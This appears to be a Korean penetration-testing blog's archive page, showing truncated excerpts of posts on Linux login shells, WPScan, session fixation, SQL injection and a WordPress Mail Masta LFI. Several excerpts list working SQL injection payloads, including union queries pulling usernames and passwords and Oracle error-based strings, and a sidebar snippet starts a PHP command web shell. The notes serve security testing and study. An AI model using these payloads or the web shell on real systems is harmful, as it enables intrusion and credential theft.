2017. 5. 30.
/bin/false
allows a login, but no shell, no ssh tunnels and no home directory.
-> 시스템의 로그인은 불가능, FTP 서버 프로그램같은 프로그램도 불가능하다.
쉘이나 ssh과 같은 터널링(원격접속) 그리고 홈디렉토리를 사용할 수 없다.
/sbin/nologin
disallows logins completely and returns a polite account unavailable message.
-> 사용자 계정의 쉘부분에 /bin/nologin 으로 설정을 하면
로긴 불가하고, 메시지들은 반환된다 ssh는 사용불가능하며 ftp의 경우 사용이 가능합니다.
참고
http://faq.hostway.co.kr/Linux_ET...
2017. 5. 25.
ScipvulDB : https://vuldb.com/
CVE : http://cve.mitre.org
OsvDB : http://www.osvdb.org
SecurityFocus : http://www.securityfocus.com/bid
SecurityTracker : http://www.securitytracker.com
wordpress 취약점 스캔, WPScan(칼리리눅스에 포함되어 있음)
- http://wpscan.org
- https://wpvulndb.com
1. 진단 환경
1) 칼리리눅스 도구 설치
2) WPScan 설치
- 워드프레스 진단에서 가장 많이 사용하는 도구는 WPScan이다.
(http://wpscan.org / https://wpvulndb.com)
WPScan은...
2017. 5. 18.
취약점 개요
: 사용자 로그인 시 항상 일정하게 고정된 세션 ID 값을 사용하는 취약점으로 로그인 시 세션마다 새로운 세션ID가 발행되지 않는다면 세션 ID를 도용한 비인가자의 접근 및 권한 우회가 가능하므로 세션 ID의 타임아웃 기능을 설정하고 세션 ID의 고정 사용을 방지하도록 설정함.
판단기준
: 양호 - 로그인별 세션 ID가 발행되는 경우
: 취약 - 로그인 세션 ID가 고정 사용되는 경우
보안설정방법
: 인증 기능에서 사용자가 인증을 받은 후에 새로운 세션 ID를 할당 받도록 발행함
모의해킹 시나리오 (부정확함, 수정 필요)
1. 해커는 웹(Target)서버에 접근하여 정상 세션을 발급받는다.
2. 해커는 희생자(admin)에게 해커가 받은 정상 세션을 강제로 Set-Cookie하고 웹으로...
2017. 5. 15.
1. 개요
- Cookie를 사용하는 경우에 시도해볼 만한 취약점.
2. 점검 방법
- 브라우저에서 서버로 전달되는 request 값의 header 값을 확인한다.
- Cookie 값중에서 USERID 값을 변조하고 서버에 전달한다.
- 만약 sql 관련 에러가 발생하면 SQL 취약점이 있다는 것이다.
- 방금 수정한 USERID 의 값을 다음과 같이 union sql 취약점을 시도한다.
USERID=1 union select accountid, acct_type from accounts;--
USERID=1 union select username, password from users;--
- 다음과 같이 sql 구문 안에 XSS 구문을 삽입 할 수도 있다.
USERID=1 union select...
2017. 5. 14.
<<Oracle SQL 인젝션>>
1. 인증 우회
- or 'abc'='abc'
- or 'ab'='a'+'b'
- or 2>1
- or 1=1
#주석문 이용 우회
'--
)'--
';--
2. 에러 기반
- 싱글 쿼터 ('), -- 주석 삽입
- 'and 1='a' 또는 'and 1/'a' 삽입
# 사용자 정보 확인
' and 1=utl_inaddr.get_host_name(user)--
# 버전 정보
' and 1=utl_inaddr.get_host_name((select banner from v$version where rownum=1))--
' and 1=utl_inaddr.get_host_name((select banner from v$instance where...
1. 개요
본 포스팅에서는 Union based 를 위해서는 기본적으로 에러정보가 웹 페이지에 노출된다는 것을 전제로 하고있다.
2. 공격 포인트
# 공격 지점 탐색
database의 에러메세지를 기반으로 한 공격이다. 즉 SQL 구문 중 group by 와 having 구문을 사용하여 에러정보가 유출되는 지점을 찾는다.
xxx.xxx.xxx.xxx/search?id=1
# 테이블, 필드 정보 획득
xxx.xxx.xxx.xxx/search?id=1' having 1=1-- 이를 통해 에러가 나는 것을 확인한다.
이를 통해, 테이블 정보와 필드 정보를 확인할 수 있는데, 아래 쿼리를 반복함으로써 데이터를 수집한다.
xxx.xxx.xxx.xxx/search?id=1' group by...
2017. 5. 10.
2017. 5. 9.
2017. 5. 8.
1. 개요
LFI 취약점 이란 Local File Inclusion의 약자로 RFI와 상당히 유사한 취약점이다. 원격지에 있는 파일이 대상이 된다면 RFI 취약점이고, 해당 대상 파일이 공격대상 서버에 위치해 위치해 있다면 LFI 취약점이라고 볼 수 있다.
본 포스팅은 워드 프레스의 mail masta 라는 플러그인을 사용 할 경우 발생 할 수 있는 LFI 취약점에 대한 것이다.
wordpress/mail-masta/inc/campaign/count_of_send.php 와 csvexport.php 에서 발생하며 include 시키는 pl 파라미터에서 검증을 하지 않아 취약점이 발생한다.
STEP 1
플러그인에서 mail masta 가 활성화 되어있는 것을 확인한다.
STEP 2
mail...
피드 구독하기:
글
(
Atom
)
Popular Posts
-
/* PHP Version URL CMD WebShell */ /* 사용법 : hxxp://URL/cmd.php?cmd=명령어 */ <? echo " <FORM ACTIO...
-
프록시 도구를 이용하여 서버에 OPTIONS 메소드를 전달하면 지원하는 메소드를 확인 할 수 있다. 그런데 간혹 버프 OPTIONS 메소드로는 확인되지 않는데 response 헤더값에 allowed method 라고 표시되는 경우가 있다. 때문에 보...
Recent Posts
Powered by Blogger.